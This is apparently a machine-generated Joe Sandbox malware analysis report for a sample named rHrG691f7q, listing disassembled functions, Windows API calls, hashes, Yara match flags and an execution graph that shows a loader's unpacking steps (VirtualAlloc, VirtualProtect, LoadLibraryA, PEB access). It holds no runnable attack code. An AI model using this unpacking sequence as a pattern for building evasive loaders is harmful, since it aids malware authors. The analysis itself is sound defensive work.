                                                                                                                                                                                                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                    • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                                                    Function 024D2959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 024D296C
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2982
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2990
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                    • Instruction ID: e1d80c824b98b0671147d1b610b0e9e8808907467c2d582b7aa7e6a49ac86936
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CE0C230100105678B14FBB99C48A7B32A86A01716B600B6BF871E30E1EBA9D1084AA8
                                                                                                                                                                                                                                                                    Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                    • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                                                    Function 024FB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024FB32B,?,00000050,?,?,?,?,?), ref: 024FB1AB
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                    • Instruction ID: 6dc8561be9c3b197c987c549b32d6757210d39e4635540fdf6410c5b1cc622e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD21A762A00105A6EBB68F54CF01797725AEBCABDDF4A8126EB09D7304E732D941C390
                                                                                                                                                                                                                                                                    Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                    • String ID: image/png
                                                                                                                                                                                                                                                                    • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                    • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                    • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                    Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                    • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                    Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                    • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                                                    • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                    • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                                                    Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                    • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                                                    Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                                                      • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                                                      • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                    • String ID: F@
                                                                                                                                                                                                                                                                    • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                                    • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                    • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                                                    Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                                                      • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                                                    • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                                                    • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                                                    • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                    • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                                                    Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                                                    • String ID: zB$~B
                                                                                                                                                                                                                                                                    • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                                                    • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                    • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                                                    Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: pThreadProxy
                                                                                                                                                                                                                                                                    • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                                                    • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                    • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                                                    Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                    • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                                                                                                                                                                                                                                    Function 024EB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024C2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024C2AAD,00000000), ref: 024EB187
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 024EB195
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,024C2AAD,00000000), ref: 024EB1F0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                    • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                    • Instruction ID: 889a65bff22dee2e63644321748b22c7b6246e322cde52ba5ac680d0d7812a25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941EB31A04216AFEF219F65CC4877FB7A5FF4176AF14416AEC5A5B2A0D7308901CB51

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:1.6%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:40%
                                                                                                                                                                                                                                                                    Signature Coverage:18.6%
                                                                                                                                                                                                                                                                    Total number of Nodes:70
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                    execution_graph 26276 8c9ece 26277 8c9edd 26276->26277 26280 8ca66e 26277->26280 26283 8ca689 26280->26283 26281 8ca692 CreateToolhelp32Snapshot 26282 8ca6ae Module32First 26281->26282 26281->26283 26284 8ca6bd 26282->26284 26285 8c9ee6 26282->26285 26283->26281 26283->26282 26287 8ca32d 26284->26287 26288 8ca358 26287->26288 26289 8ca369 VirtualAlloc 26288->26289 26290 8ca3a1 26288->26290 26289->26290 26290->26290 26291 43cd60 26292 43cd80 26291->26292 26292->26292 26295 43cdbe 26292->26295 26297 43a9b0 LdrInitializeThunk 26292->26297 26293 43ce3e 26295->26293 26298 43a9b0 LdrInitializeThunk 26295->26298 26297->26295 26298->26293 26309 43b068 26310 43b080 26309->26310 26313 43b16e 26310->26313 26315 43a9b0 LdrInitializeThunk 26310->26315 26312 43b23f 26312->26312 26313->26312 26316 43a9b0 LdrInitializeThunk 26313->26316 26315->26313 26316->26312 26317 40b44c 26318 40b57c 26317->26318 26319 40b45a 26317->26319 26319->26318 26319->26319 26322 40b65c 26319->26322 26323 43a950 26319->26323 26321 43a950 2 API calls 26321->26318 26322->26321 26324 43a976 26323->26324 26325 43a995 26323->26325 26326 43a968 26323->26326 26329 43a98a 26323->26329 26328 43a97b RtlReAllocateHeap 26324->26328 26330 438e70 26325->26330 26326->26324 26326->26325 26328->26329 26329->26322 26331 438e83 26330->26331 26332 438e94 26330->26332 26333 438e88 RtlFreeHeap 26331->26333 26332->26329 26333->26332 26334 43aecc 26336 43af00 26334->26336 26335 43af7e 26336->26335 26338 43a9b0 LdrInitializeThunk 26336->26338 26338->26335 26339 408790 26341 40879f 26339->26341 26340 408970 ExitProcess 26341->26340 26342 4087b4 GetCurrentProcessId GetCurrentThreadId 26341->26342 26345 40887a 26341->26345 26343 4087da 26342->26343 26344 4087de SHGetSpecialFolderPathW GetForegroundWindow 26342->26344 26343->26344 26344->26345 26345->26340 26346 438e51 RtlAllocateHeap 26347 43ab91 26348 43ab9a GetForegroundWindow 26347->26348 26349 43abad 26348->26349 26350 249003c 26351 2490049 26350->26351 26365 2490e0f SetErrorMode SetErrorMode 26351->26365 26356 2490265 26357 24902ce VirtualProtect 26356->26357 26359 249030b 26357->26359 26358 2490439 VirtualFree 26363 24905f4 LoadLibraryA 26358->26363 26364 24904be 26358->26364 26359->26358 26360 24904e3 LoadLibraryA 26360->26364 26362 24908c7 26363->26362 26364->26360 26364->26363 26366 2490223 26365->26366 26367 2490d90 26366->26367 26368 2490dad 26367->26368 26369 2490dbb GetPEB 26368->26369 26370 2490238 VirtualAlloc 26368->26370 26369->26370 26370->26356

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                    • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                                                    Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 254 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
